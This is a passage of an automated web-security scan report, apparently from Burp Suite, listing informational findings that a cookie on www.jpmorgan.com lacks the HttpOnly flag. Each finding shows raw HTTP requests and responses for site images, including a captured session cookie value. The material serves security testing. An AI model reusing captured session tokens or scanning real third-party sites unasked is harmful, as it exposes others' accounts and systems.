...[SNIP]...

11.623. http://www.jpmorgan.com/images/lightview/close_small.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /images/lightview/close_small.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/lightview/close_small.png HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:18 GMT
Server: Apache
Last-Modified: Wed, 27 Oct 2010 16:06:46 GMT
ETag: "42d46-257-697f3180"
Accept-Ranges: bytes
Content-Length: 599
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/png

.PNG
.
...IHDR.............5.7.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...?KBQ..O".D.A...bC...D..C.n9..../.&A.5(.......D
Q.I?..='....s.......=.y.y.{....f.d.j5.1" .. .B....0.}0s-.*.q.r...:....
...[SNIP]...

11.624. http://www.jpmorgan.com/images/lightview/controller_close.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /images/lightview/controller_close.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/lightview/controller_close.png HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:23 GMT
Server: Apache
Last-Modified: Wed, 27 Oct 2010 16:06:46 GMT
ETag: "42d47-340-697f3180"
Accept-Ranges: bytes
Content-Length: 832
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/png

.PNG
.
...IHDR...............l;....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...9o.Q.......@.....PD(
U$Z>@:..hP$S...*..o..S.uk...H..Q.H4H.....3..}..bs.4.o....5;.^.V.D.Xs.oY_..t{....d.g../......a...q
...[SNIP]...

11.625. http://www.jpmorgan.com/images/lightview/controller_next.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /images/lightview/controller_next.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/lightview/controller_next.png HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:23 GMT
Server: Apache
Last-Modified: Wed, 27 Oct 2010 16:06:46 GMT
ETag: "42d48-2f0-697f3180"
Accept-Ranges: bytes
Content-Length: 752
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/png

.PNG
.
...IHDR...............l;....tEXtSoftware.Adobe ImageReadyq.e<....IDATx....o.A....K.....*.hRD..D....4.DAc
wI..........D.("$...%
B............"#.....owg.f..ZM..+h.z.@......v./..v.n>f..1..DRx..
...[SNIP]...

11.626. http://www.jpmorgan.com/images/lightview/controller_prev.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /images/lightview/controller_prev.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/lightview/controller_prev.png HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:19 GMT
Server: Apache
Last-Modified: Wed, 27 Oct 2010 16:06:47 GMT
ETag: "42d49-2e7-698e73c0"
Accept-Ranges: bytes
Content-Length: 743
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/png

.PNG
.
...IHDR...............l;....tEXtSoftware.Adobe ImageReadyq.e<....IDATx......A......D...*.6).Y...........,.K..^.^.R_{..`!).,.v-%".(.6....f\W<B......>.....O.^.'..Z.^B.................d2.?...,..
...[SNIP]...

11.627. http://www.jpmorgan.com/images/lightview/controller_slideshow_play.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /images/lightview/controller_slideshow_play.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/lightview/controller_slideshow_play.png HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:23 GMT
Server: Apache
Last-Modified: Wed, 27 Oct 2010 16:06:47 GMT
ETag: "42d4b-363-698e73c0"
Accept-Ranges: bytes
Content-Length: 867
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/png

.PNG
.
...IHDR...............l;....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..U;K#Q.>1Q...b....N0.).B@...~....).v.j...F.sk..H..b".DX......VJ.g....;{'....s..9.=.9..N.....s.ip........#.>.w7c..www...
...[SNIP]...

11.628. http://www.jpmorgan.com/images/lightview/controller_slideshow_stop.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /images/lightview/controller_slideshow_stop.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/lightview/controller_slideshow_stop.png HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:19 GMT
Server: Apache
Last-Modified: Wed, 27 Oct 2010 16:06:47 GMT
ETag: "42d4c-2aa-698e73c0"
Accept-Ranges: bytes
Content-Length: 682
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/png

.PNG
.
...IHDR...............l;....tEXtSoftware.Adobe ImageReadyq.e<...LIDATx....n.A...;H...P..M...... .....p..i..T.D...%:.".{.S!@....g6.xW!.............z=."....-mI....t,.I...I.y~f.Y|.V.5.\.....~..
...[SNIP]...

11.629. http://www.jpmorgan.com/images/lightview/inner_next.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /images/lightview/inner_next.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/lightview/inner_next.png HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:19 GMT
Server: Apache
Last-Modified: Wed, 27 Oct 2010 16:06:47 GMT
ETag: "42d4e-134-698e73c0"
Accept-Ranges: bytes
Content-Length: 308
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/png

.PNG
.
...IHDR..............H-.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.b...?.9..D..3.....` v.bc..Y .    .k..1H %%...
,.........b. .... A&$..i.......E...E....Gh...5.....P.O....5.#IH.1#...}....j..
...[SNIP]...

11.630. http://www.jpmorgan.com/images/lightview/inner_prev.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /images/lightview/inner_prev.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/lightview/inner_prev.png HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:18 GMT
Server: Apache
Last-Modified: Wed, 27 Oct 2010 16:06:47 GMT
ETag: "42d4f-133-698e73c0"
Accept-Ranges: bytes
Content-Length: 307
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/png

.PNG
.
...IHDR..............H-.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.b...?.9..D..3.....` v.bc..Y .    .k..1H %%...
,.........b. .... A&$..5.A3...F.Yc0..GP...h.F...$....).pqG.....PM..|F(.D.h...
...[SNIP]...

11.631. http://www.jpmorgan.com/images/lightview/inner_slideshow_stop.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /images/lightview/inner_slideshow_stop.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/lightview/inner_slideshow_stop.png HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:18 GMT
Server: Apache
Last-Modified: Wed, 27 Oct 2010 16:06:47 GMT
ETag: "42d51-1fa-698e73c0"
Accept-Ranges: bytes
Content-Length: 506
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/png

.PNG
.
...IHDR...,.........T..<....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..V1N.@........<.4.((..."J^`..:<!.hc...(\Zq."R......K.`v..Z].v
$..&..[.............'.s3.&.    .!.O.J.....q.wK..#L..V..pOH    ..
...[SNIP]...

11.632. http://www.jpmorgan.com/images/lightview/loading.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /images/lightview/loading.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/lightview/loading.gif HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:18 GMT
Server: Apache
Last-Modified: Wed, 27 Oct 2010 16:06:47 GMT
ETag: "42d52-703-698e73c0"
Accept-Ranges: bytes
Content-Length: 1795
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/gif

GIF89a.....?............................................................................................................................................................................................
...[SNIP]...

11.633. http://www.jpmorgan.com/images/lightview/prev.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /images/lightview/prev.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/lightview/prev.png HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:17 GMT
Server: Apache
Last-Modified: Wed, 27 Oct 2010 16:06:47 GMT
ETag: "42d55-23c-698e73c0"
Accept-Ranges: bytes
Content-Length: 572
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/png

.PNG
.
...IHDR................|....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..T=k.A..;....B.:...X.t....;..Z.L.&....    h..6...H.H!6.EP......%w.f...s..{of....J%R...3..Y...#.?...{...3.8.
...[SNIP]...

11.634. http://www.jpmorgan.com/images/lightview/topclose.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /images/lightview/topclose.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/lightview/topclose.png HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:17 GMT
Server: Apache
Last-Modified: Wed, 27 Oct 2010 16:06:47 GMT
ETag: "42d56-2ac-698e73c0"
Accept-Ranges: bytes
Content-Length: 684
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/png

.PNG
.
...IHDR............._%.-....tEXtSoftware.Adobe ImageReadyq.e<...NIDATx...=k.Q.../.._...N.P.&....N.....R.:    ....K....h?H.[.....n..T....w....)...O.=......].JE....N.Jq....)~(.+.*~.+..g0.l..h.\?
...[SNIP]...

11.635. http://www.jpmorgan.com/images/logo_jpm_2008.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /images/logo_jpm_2008.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/logo_jpm_2008.gif HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:11 GMT
Server: Apache
Last-Modified: Wed, 16 Jul 2008 21:13:58 GMT
ETag: "72ab3-869-9a51d180"
Accept-Ranges: bytes
Content-Length: 2153
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/gif

GIF89a..)..........H4)k[R.........yjc.xqVC9:#.?).;%....='.<&.!.......,......)....PI&.b8..k~Y(> &....l...G.4v.V..|O..[0...;..r.....(.`80Z$..Pca.R..{..47...^..?....x...26.B.b....zJ.(XYLV|}.L) 3}o7pGxlfW
...[SNIP]...

11.636. http://www.jpmorgan.com/images/logo_jpm_2008_bw.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /images/logo_jpm_2008_bw.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/logo_jpm_2008_bw.gif HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:11 GMT
Server: Apache
Last-Modified: Tue, 29 Jul 2008 12:47:20 GMT
ETag: "72ab4-884-a650600"
Accept-Ranges: bytes
Content-Length: 2180
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/gif

GIF89a..+.............aaa...ZZZ.........QQQzzz.........EEE|||.........%%%---...@@@...vvvHHHeee\\\............:::......VVV III..................***.........nnn.........MMM...888000...666...kkk...pppO
...[SNIP]...

11.637. http://www.jpmorgan.com/images/more_services_arrow.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /images/more_services_arrow.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/more_services_arrow.gif HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:16 GMT
Server: Apache
Last-Modified: Thu, 17 Jul 2008 22:14:32 GMT
ETag: "72abd-63-90c3a200"
Accept-Ranges: bytes
Content-Length: 99
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/gif

GIF89a.......tc[...P<1...?).dQI...5..!.......,..........(x...0.I....S..B.y.1...H(..P[.$Hu.E.[.....;

